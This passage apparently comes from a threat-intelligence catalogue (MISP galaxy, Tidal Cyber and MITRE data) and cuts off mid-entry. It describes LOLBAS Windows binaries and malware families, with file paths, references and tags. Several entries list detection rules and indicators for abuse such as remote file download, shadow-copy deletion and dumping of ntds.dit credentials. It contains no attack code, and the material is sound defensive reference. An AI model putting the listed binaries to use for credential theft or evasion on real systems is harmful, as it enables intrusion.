Description: This binary can be downloaded alongside multiple software downloads on the Microsoft website. It gets downloaded when the user forgets to uncheck the option to set Bing as the default search provider.

Author: @checkymander

Paths:
* C:\Program Files (x86)\Microsoft\DefaultPack\

Resources:
* https://twitter.com/checkymander/status/1311509470275604480

Detection:
* Sigma: proc_creation_win_lolbin_defaultpack.yml
* IOC: DefaultPack.EXE spawned an unknown process[DefaultPack.EXE - LOLBAS Project]

Internal MISP references

UUID ff25ec03-1e8d-427e-b207-1e1ecca542ec which can be used as unique global reference for DefaultPack in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5212
source Tidal Cyber
tags ['4f7be515-680e-4375-81f6-c71c83dd440d', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Defender Control

Defender Control is a tool purpose-built to disable Microsoft Defender.[U.S. CISA Understanding LockBit June 2023]

Internal MISP references

UUID e8830cf3-53f3-4d15-858c-584589405fad which can be used as unique global reference for Defender Control in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5029
source Tidal Cyber
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', '39d6e8b7-6c8a-4ec5-a584-54ca32aa29fb', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

Denis

Denis is a Windows backdoor and Trojan used by APT32. Denis shares several similarities with the SOUNDBITE backdoor and has been used in conjunction with the Goopy backdoor.[Cybereason Oceanlotus May 2017]

Internal MISP references

UUID df4002d2-f557-4f95-af7a-9a4582fb7068 which can be used as unique global reference for Denis in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0354
source MITRE
tags ['febea5b6-2ea2-402b-8bec-f3f5b3f73c59']
type ['malware']
Related clusters

To see the related clusters, click here.

Derusbi

Derusbi is malware used by multiple Chinese APT groups.[Novetta-Axiom][ThreatConnect Anthem] Both Windows and Linux variants have been observed.[Fidelis Turbo]

Internal MISP references

UUID 9222aa77-922e-43c7-89ad-71067c428fb2 which can be used as unique global reference for Derusbi in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'Windows']
software_attack_id S0021
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

Desk

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Desktop Settings Control Panel

Author: Hai Vaknin

Paths:
* C:\Windows\System32\desk.cpl
* C:\Windows\SysWOW64\desk.cpl

Resources:
* https://vxug.fakedoma.in/zines/29a/29a7/Articles/29A-7.030.txt
* https://twitter.com/pabraeken/status/998627081360695297
* https://twitter.com/VakninHai/status/1517027824984547329
* https://jstnk9.github.io/jstnk9/research/InstallScreenSaver-SCR-files

Detection:
* Sigma: file_event_win_new_src_file.yml
* Sigma: proc_creation_win_lolbin_rundll32_installscreensaver.yml
* Sigma: registry_set_scr_file_executed_by_rundll32.yml[Desk.cpl - LOLBAS Project]

Internal MISP references

UUID 1863a7e2-6212-48a0-b109-15d0198b93e2 which can be used as unique global reference for Desk in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5188
source Tidal Cyber
tags ['7ad2b1d5-c228-4bf5-bf8e-c80a8fef0079', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Desktopimgdownldr

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Windows binary used to configure lockscreen/desktop image

Author: Gal Kristal

Paths:
* c:\windows\system32\desktopimgdownldr.exe

Resources:
* https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/

Detection:
* Sigma: proc_creation_win_desktopimgdownldr_susp_execution.yml
* Sigma: file_event_win_susp_desktopimgdownldr_file.yml
* Elastic: command_and_control_remote_file_copy_desktopimgdownldr.toml
* IOC: desktopimgdownldr.exe that creates non-image file
* IOC: Change of HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\PersonalizationCSP\LockScreenImageUrl[Desktopimgdownldr.exe - LOLBAS Project]

Internal MISP references

UUID 1b31652d-30bb-4c6e-bfe1-f2921a0aa64e which can be used as unique global reference for Desktopimgdownldr in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5100
source Tidal Cyber
tags ['acc0e091-a071-4e83-b0b1-4f3adebeafa3', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

DeviceCredentialDeployment

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Device Credential Deployment

Author: Elliot Killick

Paths:
* C:\Windows\System32\DeviceCredentialDeployment.exe

Resources: None Provided

Detection:
* IOC: DeviceCredentialDeployment.exe should not be run on a normal workstation
* Sigma: proc_creation_win_lolbin_device_credential_deployment.yml[DeviceCredentialDeployment.exe - LOLBAS Project]

Internal MISP references

UUID b99bdf39-8dcf-4bae-95af-b029d48cb579 which can be used as unique global reference for DeviceCredentialDeployment in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5101
source Tidal Cyber
tags ['2a08c2eb-e90e-4bdb-a2dd-9da06de7ed25', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Devinit

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Visual Studio 2019 tool

Author: mr.d0x

Paths:
* C:\Program Files\Microsoft Visual Studio*\Community\Common7\Tools\devinit\devinit.exe
* C:\Program Files (x86)\Microsoft Visual Studio*\Community\Common7\Tools\devinit\devinit.exe

Resources:
* https://twitter.com/mrd0x/status/1460815932402679809

Detection:
* Sigma: proc_creation_win_devinit_lolbin_usage.yml[Devinit.exe - LOLBAS Project]

Internal MISP references

UUID 102714a0-6b18-4d05-83c2-dd2929ce685a which can be used as unique global reference for Devinit in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5213
source Tidal Cyber
tags ['bb814941-0155-49b1-8f93-39626d4f0ddd', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Devtoolslauncher

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Binary that will execute a specified binary. Part of the VS/VS Code installation.

Author: felamos

Paths: * c:\windows\system32\devtoolslauncher.exe

Resources: * https://twitter.com/_felamos/status/1179811992841797632

Detection:
* Sigma: proc_creation_win_lolbin_devtoolslauncher.yml
* IOC: DeveloperToolsSvc.exe spawned an unknown process[Devtoolslauncher.exe - LOLBAS Project]

Internal MISP references

UUID 6e213e33-c2e5-494f-bc1a-bf672f95dcf8 which can be used as unique global reference for Devtoolslauncher in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5214
source Tidal Cyber
tags ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

devtunnel

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Binary to enable forwarded ports on Windows operating systems.

Author: Kamran Saifullah

Paths:
* C:\Users\\AppData\Local\Temp.net\devtunnel\
* C:\Users\\AppData\Local\Temp\DevTunnels

Resources: * https://code.visualstudio.com/docs/editor/port-forwarding

Detection:
* IOC: devtunnel.exe binary spawned
* IOC: .devtunnels.ms
* IOC: .*.devtunnels.ms
* Analysis: https://cydefops.com/vscode-data-exfiltration[devtunnel.exe - LOLBAS Project]

Internal MISP references

UUID 672d80fe-656e-4b1b-8234-ebf2c5339166 which can be used as unique global reference for devtunnel in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5252
source Tidal Cyber
tags ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

DEWMODE

According to joint Cybersecurity Advisory AA23-158A (June 2023), DEWMODE is a web shell written in PHP that is designed to interact with a MySQL database. During a campaign from 2020 to 2021, threat actors exploited multiple zero-day vulnerabilities in internet-facing Accellion File Transfer Appliance (FTA) devices, installing DEWMODE web shells to exfiltrate data from compromised networks.[Mandiant MOVEit Transfer June 2 2023]

Malpedia (Research): https://malpedia.caad.fkie.fraunhofer.de/details/php.dewmode

Malware Bazaar (Samples & IOCs): https://bazaar.abuse.ch/browse/tag/dewmode/

Internal MISP references

UUID ff0b0792-5dd0-4e10-8b84-8da93a0198aa which can be used as unique global reference for DEWMODE in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Linux']
software_attack_id S5021
source Tidal Cyber
tags ['a98d7a43-f227-478e-81de-e7299639a355', '311abf64-a9cc-4c6a-b778-32c5df5658be']
type ['malware']

Dfshim

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: ClickOnce engine in Windows used by .NET

Author: Oddvar Moe

Paths:
* C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe
* C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe
* C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe
* C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe

Resources:
* https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
* https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe

Detection: * Sigma: proc_creation_win_rundll32_susp_activity.yml[Dfshim.dll - LOLBAS Project]

Internal MISP references

UUID b396eb52-3b6a-44e9-9534-d8b981a52192 which can be used as unique global reference for Dfshim in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5189
source Tidal Cyber
tags ['91fd24c3-f371-4c3b-b997-cd85e25c0967', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Dfsvc

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: ClickOnce engine in Windows used by .NET

Author: Oddvar Moe

Paths:
* C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe
* C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe
* C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe
* C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe

Resources:
* https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
* https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe

Detection: * Sigma: proc_creation_win_rundll32_susp_activity.yml[Dfsvc.exe - LOLBAS Project]

Internal MISP references

UUID f85966ec-0c4d-4f7e-949f-bb73828bf601 which can be used as unique global reference for Dfsvc in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5102
source Tidal Cyber
tags ['18d6d91d-7df0-44c8-88fe-986d9ba00b8d', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Diantz

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Binary that packages existing files into a cabinet (.cab) file

Author: Tamir Yehuda

Paths:
* c:\windows\system32\diantz.exe
* c:\windows\syswow64\diantz.exe

Resources: * https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/diantz

Detection:
* Sigma: proc_creation_win_lolbin_diantz_ads.yml
* Sigma: proc_creation_win_lolbin_diantz_remote_cab.yml
* IOC: diantz storing data into alternate data streams.
* IOC: diantz getting a file from a remote machine or the internet.[diantz.exe_lolbas]

Internal MISP references

UUID 054ddf05-e9f0-4d14-8493-2a1b2ddbefad which can be used as unique global reference for Diantz in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5103
source Tidal Cyber
tags ['96f9b39f-0c59-48a0-9702-01920c1293a7', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Diavol

Diavol is a ransomware variant first observed in June 2021 that is capable of prioritizing file types to encrypt based on a pre-configured list of extensions defined by the attacker. Diavol has been deployed by Bazar and is thought to have potential ties to Wizard Spider.[Fortinet Diavol July 2021][FBI Flash Diavol January 2022][DFIR Diavol Ransomware December 2021]

Internal MISP references

UUID d057b6e7-1de4-4f2f-b374-7e879caecd67 which can be used as unique global reference for Diavol in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0659
source MITRE
tags ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172']
type ['malware']

Dipsind

Dipsind is a malware family of backdoors that appear to be used exclusively by PLATINUM. [Microsoft PLATINUM April 2016]

Internal MISP references

UUID 226ee563-4d49-48c2-aa91-82999f43ce30 which can be used as unique global reference for Dipsind in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0200
source MITRE
type ['malware']

Disco

Disco is a custom implant that has been used by MoustachedBouncer since at least 2020, including in campaigns using targeted malicious content injection for initial access and command and control.[MoustachedBouncer ESET August 2023]

Internal MISP references

UUID 194314e3-4edc-5346-96b6-d2d7bf5d830a which can be used as unique global reference for Disco in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S1088
source MITRE
type ['malware']

Diskshadow

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Diskshadow.exe is a tool that exposes the functionality offered by the Volume Shadow Copy Service (VSS).

Author: Oddvar Moe

Paths:
* C:\Windows\System32\diskshadow.exe
* C:\Windows\SysWOW64\diskshadow.exe

Resources: * https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/

Detection:
* Sigma: proc_creation_win_lolbin_diskshadow.yml
* Sigma: proc_creation_win_susp_shadow_copies_deletion.yml
* Elastic: credential_access_cmdline_dump_tool.toml
* IOC: Child process from diskshadow.exe[Diskshadow.exe - LOLBAS Project]

Internal MISP references

UUID 07c49566-5bea-44dc-b81f-e6c90bda9c39 which can be used as unique global reference for Diskshadow in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5104
source Tidal Cyber
tags ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Dnscmd

Dnscmd is a Windows command-line utility used to manage DNS servers.[Dnscmd Microsoft]

Internal MISP references

UUID 3fd09997-86e0-4dce-935e-421863e9bad0 which can be used as unique global reference for Dnscmd in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5016
source Tidal Cyber
tags ['a45f9597-09c4-4e70-a7d3-d8235d2451a3', '758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

DnsSystem

DnsSystem is a .NET-based DNS backdoor, a customized version of the open source tool DIG.net, that has been used by HEXANE since at least June 2022.[Zscaler Lyceum DnsSystem June 2022]

Internal MISP references

UUID e69a913d-4ddc-4d69-9961-25a31cae5899 which can be used as unique global reference for DnsSystem in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S1021
source MITRE
type ['malware']

dnx

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: .NET execution environment file included with .NET.

Author: Oddvar Moe

Paths: * N/A

Resources: * https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/

Detection:
* Sigma: proc_creation_win_lolbin_dnx.yml
* Elastic: defense_evasion_unusual_process_network_connection.toml
* Elastic: defense_evasion_network_connection_from_windows_binary.toml
* BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules[dnx.exe - LOLBAS Project]

Internal MISP references

UUID e2bdda2e-54b4-4d35-b7e5-4e20626a4481 which can be used as unique global reference for dnx in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5215
source Tidal Cyber
tags ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

DOGCALL

DOGCALL is a backdoor used by APT37 that has been used to target South Korean government and military organizations in 2017. It is typically dropped using a Hangul Word Processor (HWP) exploit. [FireEye APT37 Feb 2018]

Internal MISP references

UUID 81ce23c0-f505-4d75-9928-4fbd627d3bc2 which can be used as unique global reference for DOGCALL in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0213
source MITRE
tags ['16b47583-1c54-431f-9f09-759df7b5ddb7']
type ['malware']

Dok

Dok is a Trojan application disguised as a .zip file that is able to collect user credentials and install a malicious proxy server to redirect a user's network traffic (i.e. Adversary-in-the-Middle).[objsee mac malware 2017][hexed osx.dok analysis 2019][CheckPoint Dok]

Internal MISP references

UUID dfa14314-3c64-4a10-9889-0423b884f7aa which can be used as unique global reference for Dok in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['macOS']
software_attack_id S0281
source MITRE
type ['malware']

Doki

Doki is a backdoor that uses a unique Dogecoin-based Domain Generation Algorithm and was first observed in July 2020. Doki was used in conjunction with the ngrok Mining Botnet in a campaign that targeted Docker servers in cloud platforms. [Intezer Doki July 20]

Internal MISP references

UUID e6160c55-1868-47bd-bec6-7becbf236bbb which can be used as unique global reference for Doki in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Containers', 'Linux']
software_attack_id S0600
source MITRE
tags ['efa33611-88a5-40ba-9bc4-3d85c6c8819b']
type ['malware']

Donut

Donut is an open source framework used to generate position-independent shellcode.[Donut Github][Introducing Donut] Donut-generated code has been used by multiple threat actors to inject and load malicious payloads into memory.[NCC Group WastedLocker June 2020]

Internal MISP references

UUID 40d25a38-91f4-4e07-bb97-8866bed8e44f which can be used as unique global reference for Donut in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0695
source MITRE
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96']
type ['tool']

Dotnet

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: dotnet.exe comes with .NET Framework

Author: felamos

Paths: * C:\Program Files\dotnet\dotnet.exe

Resources:
* https://twitter.com/_felamos/status/1204705548668555264
* https://gist.github.com/bohops/3f645a7238d8022830ecf5511b3ecfbc
* https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/
* https://learn.microsoft.com/en-us/dotnet/fsharp/tools/fsharp-interactive/

Detection:
* Sigma: proc_creation_win_lolbin_dotnet.yml
* BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
* IOC: dotnet.exe spawned an unknown process[Dotnet.exe - LOLBAS Project]

Internal MISP references

UUID 1bcd9c93-0944-4671-ab01-cabc5ffe30bf which can be used as unique global reference for Dotnet in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5216
source Tidal Cyber
tags ['09c24b93-bf06-4cbb-acb0-d7b9657a41dc', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Downdelph

Downdelph is a first-stage downloader written in Delphi that has been used by APT28 in rare instances between 2013 and 2015. [ESET Sednit Part 3]

Internal MISP references

UUID f7b64b81-f9e7-46bf-8f63-6d7520da832c which can be used as unique global reference for Downdelph in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0134
source MITRE
tags ['84615fe0-c2a5-4e07-8957-78ebc29b4635']
type ['malware']

down_new

down_new is a downloader that has been used by BRONZE BUTLER since at least 2019.[Trend Micro Tick November 2019]

Internal MISP references

UUID 20b796cf-6c90-4928-999e-88107078e15e which can be used as unique global reference for down_new in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0472
source MITRE
tags ['84615fe0-c2a5-4e07-8957-78ebc29b4635']
type ['malware']

DownPaper

DownPaper is a backdoor Trojan; its main functionality is to download and run second stage malware. [ClearSky Charming Kitten Dec 2017]

Internal MISP references

UUID fc433c9d-a7fe-4915-8aa0-06b58f288249 which can be used as unique global reference for DownPaper in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0186
source MITRE
type ['malware']

DRATzarus

DRATzarus is a remote access tool (RAT) that has been used by Lazarus Group to target defense and aerospace organizations globally since at least summer 2020. DRATzarus shares similarities with Bankshot, which was used by Lazarus Group in 2017 to target the Turkish financial sector.[ClearSky Lazarus Aug 2020]

Internal MISP references

UUID c6c79fc5-e4b1-4f6c-a71d-d22d699d5caf which can be used as unique global reference for DRATzarus in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0694
source MITRE
type ['malware']

Dridex

Dridex is a prolific banking Trojan that first appeared in 2014. By December 2019, the US Treasury estimated Dridex had infected computers in hundreds of banks and financial institutions in over 40 countries, leading to more than $100 million in theft. Dridex was created from the source code of the Bugat banking Trojan (also known as Cridex).[Dell Dridex Oct 2015][Kaspersky Dridex May 2017][Treasury EvilCorp Dec 2019]

Internal MISP references

UUID e3cd4405-b698-41d9-88e4-fff29e7a19e2 which can be used as unique global reference for Dridex in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0384
source MITRE
tags ['e809d252-12cc-494d-94f5-954c49eb87ce']
type ['malware']

DropBook

DropBook is a Python-based backdoor compiled with PyInstaller.[Cybereason Molerats Dec 2020]

Internal MISP references

UUID 9c44d3f9-7a7b-4716-9cfa-640b36548ab0 which can be used as unique global reference for DropBook in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0547
source MITRE
type ['malware']

Drovorub

Drovorub is a Linux malware toolset comprising an agent, client, server, and kernel modules, that has been used by APT28.[NSA/FBI Drovorub August 2020]

Internal MISP references

UUID bb7f7c19-ffb5-4bfe-99b1-ead3525c5e7b which can be used as unique global reference for Drovorub in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux']
software_attack_id S0502
source MITRE
tags ['febea5b6-2ea2-402b-8bec-f3f5b3f73c59', '1efd43ee-5752-49f2-99fe-e3441f126b00', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']

dsdbutil

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Dsdbutil is a command-line tool that is built into Windows Server. It is available if you have the AD LDS server role installed. It can be used from the command line to export Active Directory.

Author: Ekitji

Paths:
* C:\Windows\System32\dsdbutil.exe
* C:\Windows\SysWOW64\dsdbutil.exe

Resources:
* https://gist.github.com/bohops/88561ca40998e83deb3d1da90289e358
* https://www.netwrix.com/ntds_dit_security_active_directory.html

Detection:
* IOC: Event ID 4688
* IOC: dsdbutil.exe process creation
* IOC: Event ID 4663
* IOC: Regular and Volume Shadow Copy attempts to read or modify ntds.dit
* IOC: Event ID 4656
* IOC: Regular and Volume Shadow Copy attempts to read or modify ntds.dit
* Analysis: None Provided
* Sigma: None Provided
* Elastic: None Provided
* Splunk: None Provided
* BlockRule: None Provided[dsdbutil.exe - LOLBAS Project]

Internal MISP references

UUID 9139c12f-a6d9-4300-8735-9298bc46a0bf which can be used as unique global reference for dsdbutil in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5217
source Tidal Cyber
tags ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

dsquery

dsquery is a command-line utility that can be used to query Active Directory for information from a system within a domain. [TechNet Dsquery] It is typically installed only on Windows Server versions but can be installed on non-server variants through the Microsoft-provided Remote Server Administration Tools bundle.

Internal MISP references

UUID 06402bdc-a4a1-4e4a-bfc4-09f2c159af75 which can be used as unique global reference for dsquery in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0105
source MITRE
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'cb3d30b3-8cfc-4202-8615-58a9b8f7f118', 'cd1b5d44-226e-4405-8985-800492cf2865']
type ['tool']

Dtrack

Dtrack is spyware that was discovered in 2019 and has been used against Indian financial institutions, research facilities, and the Kudankulam Nuclear Power Plant. Dtrack shares similarities with the DarkSeoul campaign, which was attributed to Lazarus Group. [Kaspersky Dtrack][Securelist Dtrack][Dragos WASSONITE][CyberBit Dtrack][ZDNet Dtrack]

Internal MISP references

UUID aa21462d-9653-48eb-a82e-5c93c9db5f7a which can be used as unique global reference for Dtrack in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0567
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']

Dump64

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Memory dump tool that comes with Microsoft Visual Studio

Author: mr.d0x

Paths: * C:\Program Files (x86)\Microsoft Visual Studio\Installer\Feedback\dump64.exe

Resources: * https://twitter.com/mrd0x/status/1460597833917251595

Detection:
* Sigma: proc_creation_win_lolbin_dump64.yml
* IOC: As a Windows SDK binary, execution on a system may be suspicious[Dump64.exe - LOLBAS Project]

Internal MISP references

UUID 13482336-e22b-48e9-bd49-c6e6fc6612ec which can be used as unique global reference for Dump64 in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5218
source Tidal Cyber
tags ['0f09c7f5-ba57-4ef0-a196-e85558804496', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

DumpMinitool

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Dump tool that is part of Visual Studio 2022

Author: mr.d0x

Paths: * C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\Extensions\TestPlatform\Extensions

Resources: * https://twitter.com/mrd0x/status/1511415432888131586

Detection:
* Sigma: proc_creation_win_dumpminitool_execution.yml
* Sigma: proc_creation_win_dumpminitool_susp_execution.yml
* Sigma: proc_creation_win_devinit_lolbin_usage.yml[DumpMinitool.exe - LOLBAS Project]

Internal MISP references

UUID 7f3bf76a-4e6a-45f1-a4bf-400d5a914e52 which can be used as unique global reference for DumpMinitool in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5219
source Tidal Cyber
tags ['3b6ad94f-83ce-47bf-b82d-b98358d23434', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Duqu

Duqu is a malware platform that uses a modular approach to extend functionality after deployment within a target network. [Symantec W32.Duqu]

Internal MISP references

UUID d4a664e5-9819-4f33-8b2b-e6f8e6a64999 which can be used as unique global reference for Duqu in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0038
source MITRE
type ['malware']

DustySky

DustySky is multi-stage malware written in .NET that has been used by Molerats since May 2015. [DustySky] [DustySky2][Kaspersky MoleRATs April 2019]

Internal MISP references

